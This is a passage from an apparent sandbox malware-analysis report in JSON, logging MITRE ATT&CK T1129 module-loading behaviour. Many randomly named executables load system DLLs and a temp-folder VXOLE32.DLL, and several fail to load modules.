\"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rxfxxnn.exe\" loaded module \"KERNEL32\" at base 77490000\n \"rxfxxnn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rxfxxnn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"lxhhl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"lxhhl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lxhhl.exe\" loaded module \"KERNEL32\" at base 77490000\n \"lxhhl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lxhhl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"lxhhl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"vhftp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"vhftp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vhftp.exe\" loaded module \"KERNEL32\" at base 77490000\n \"vhftp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rtrnhfh.exe\" loaded module \"MSVCRT.DLL\" at base 76d20000\n \"rtrnhfh.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"rtrnhfh.exe\" loaded module \"USER32.DLL\" at base 76af0000\n \"rtrnhfh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"lhrhrpt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"lhrhrpt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lhrhrpt.exe\" loaded module \"KERNEL32\" at base 77490000\n \"lhrhrpt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lhrhrpt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0004664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005812)\n \"0004664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005812)\n \"0004664.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005812)\n \"0004664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005812)\n \"4060800.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006068)\n \"4060800.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006068)\n \"4060800.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006068)\n \"4060800.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006068)\n \"lthxxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005940)\n \"lthxxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005940)\n \"lthxxd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005940)\n \"lthxxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005940)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005464)\n \"004422.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006136)\n \"004422.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006136)\n \"004422.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006136)\n \"pnrdltb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006016)\n \"pnrdltb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006016)\n \"pnrdltb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006016)\n \"pnrdltb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006016)\n \"xnpjdph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004280)\n \"xnpjdph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004280)\n \"xnpjdph.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004280)\n \"xnpjdph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004280)\n \"024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002764)\n \"024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002764)\n \"024648.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002764)\n \"024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002764)\n \"640660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005892)\n \"640660.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005892)\n \"22404.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004336)\n \"22404.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004336)\n \"22404.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004336)\n \"22404.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004336)\n \"4862082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003560)\n \"4862082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003560)\n \"4862082.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003560)\n \"4862082.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003560)\n \"fnvpbxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003432)\n \"fnvpbxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003432)\n \"fnvpbxr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003432)\n \"fnvpbxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003432)\n \"njdbdxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003540)\n \"njdbdxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003540)\n \"njdbdxd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003540)\n \"njdbdxd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003540)\n \"brrppv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003764)\n \"brrppv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003764)\n \"brrppv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003764)\n \"brrppv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003764)\n \"22260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001920)\n \"22260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001920)\n \"22260.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001920)\n \"22260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001920)\n \"26064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003484)\n \"26064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003484)\n \"26064.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003484)\n \"26064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003484)\n \"2848464.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004200)\n \"2848464.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004200)\n \"2848464.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004200)\n \"2848464.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004200)\n \"vdxvjb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001380)\n \"vdxvjb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001380)\n \"vdxvjb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001380)\n \"vdxvjb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001380)\n \"664004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004244)\n \"664004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004244)\n \"664004.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004244)\n \"664004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004244)\n \"482028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002776)\n \"482028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002776)\n \"482028.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002776)\n \"482028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002776)\n \"6466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003700)\n \"6466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003700)\n \"6466842.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003700)\n \"6466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003700)\n \"82080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003272)\n \"82080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003272)\n \"82080.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003272)\n \"82080.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003272)\n \"02848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002976)\n \"02848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002976)\n \"02848.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002976)\n \"02848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002976)\n \"202808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004104)\n \"202808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004104)\n \"202808.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004104)\n \"202808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004104)\n \"fjhdxhf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003556)\n \"fjhdxhf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003556)\n \"fjhdxhf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003556)\n \"fjhdxhf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003556)\n \"fhjttl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004172)\n \"fhjttl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004172)\n \"fhjttl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004172)\n \"fhjttl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004172)\n \"22624.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004092)\n \"22624.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004092)\n \"22624.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004092)\n \"22624.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004092)\n \"482820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003804)\n \"482820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003804)\n \"482820.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003804)\n \"482820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003804)\n \"vbtfdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002580)\n \"vbtfdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002580)\n \"vbtfdd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002580)\n \"vbtfdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002580)\n \"nlrvnpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000328)\n \"nlrvnpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000328)\n \"nlrvnpx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000328)\n \"nlrvnpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000328)\n \"xvprxbd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000900)\n \"xvprxbd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000900)\n \"xvprxbd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000900)\n \"xvprxbd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000900)\n \"vdphh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002832)\n \"vdphh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002832)\n \"vdphh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002832)\n \"vdphh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002832)\n \"0484008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002836)\n \"0484008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002836)\n \"0484008.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002836)\n \"0484008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002836)\n \"88060.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004080)\n \"88060.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004080)\n \"88060.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004080)\n \"8084222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000416)\n \"8084222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000416)\n \"8084222.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000416)\n \"8084222.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000416)\n \"xprhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002252)\n \"xprhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002252)\n \"xprhl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002252)\n \"xprhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002252)\n \"rxfxxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001884)\n \"rxfxxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001884)\n \"rxfxxnn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001884)\n \"rxfxxnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001884)\n \"lxhhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004488)\n \"lxhhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004488)\n \"lxhhl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004488)\n \"lxhhl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004488)\n \"vhftp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002488)\n \"vhftp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002488)\n \"vhftp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002488)\n \"vhftp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002488)\n \"rtrnhfh.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003748)\n \"rtrnhfh.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003748)\n \"rtrnhfh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003748)\n \"lhrhrpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003252)\n \"lhrhrpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003252)\n \"lhrhrpt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003252)\n \"lhrhrpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003252)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0004664.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0004664.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4060800.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4060800.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lthxxd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lthxxd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rrjxnjh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rrjxnjh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pnrdltb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pnrdltb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xnpjdph.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xnpjdph.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"024648.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"024648.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"640660.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"640660.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22404.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22404.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4862082.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4862082.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fnvpbxr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fnvpbxr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"njdbdxd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"njdbdxd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"brrppv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"brrppv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22260.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22260.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"26064.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"26064.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2848464.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2848464.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vdxvjb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vdxvjb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"664004.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"664004.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"482028.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"482028.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6466842.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6466842.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"82080.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"82080.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02848.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02848.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"202808.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"202808.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fjhdxhf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fjhdxhf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fhjttl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fhjttl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22624.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22624.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"482820.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"482820.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vbtfdd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vbtfdd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nlrvnpx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nlrvnpx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xvprxbd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xvprxbd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vdphh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vdphh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0484008.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0484008.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8084222.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8084222.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xprhl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xprhl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rxfxxnn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rxfxxnn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; 